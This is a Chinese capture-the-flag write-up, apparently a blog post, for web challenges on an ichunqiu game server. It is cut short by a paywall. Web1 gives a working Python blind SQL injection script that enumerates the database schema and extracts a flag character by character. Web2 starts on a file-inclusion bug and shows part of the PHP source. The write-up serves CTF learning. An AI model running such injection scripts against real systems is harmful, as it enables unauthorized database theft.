WEB
Web1
很简单直接上脚本
#_*_coding:utf-8_*_
import requests
import string
def get_content1(s):
flag=''
for i in range(1,50):
key=0
for j in range(32,127):
url = 'http://882f7dfa1dfa4a4db6a3f073371526c8d0a65024718440ce.game.ichunqiu.com/index.php?id='
add='(select ascii(substr(('+str(s)+'),'+str(i)+',1)) like '+str(j)+')'
tempurl=url+add
content = requests.get(tempurl).text.encode('utf-8')
if "Hacker" in content:
flag+=chr(j)
key=1
print flag
break
if key==0:
break
print flag
#get_content1("database()") #words
#get_content1("select schema_name from information_schema.schemata limit 0,1")
#words
#get_content1("select table_name from information_schema.tables where table_schema like 0x776f726473 limit 0,1")
#f14g
#get_content1("select column_name from information_schema.columns where table_name like 0x66313467 limit 0,1")
#f14g
get_content1("select f14g from f14g limit 0,1")
#flag{0fabacd1-fda2-4899-8cc5-711105c286f7}
Web2
上来看到以为是git源码泄露,但是并不是,结果是文件包含
http://e0c9660c9d3f4434a7e8590db1add9fa7466d50e0ff34c91.game.ichunqiu.com/index.php?action=index
<?php
include "function.php";
if(isset($_GET["action"])){
$page = addslashes($_GET["action"
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
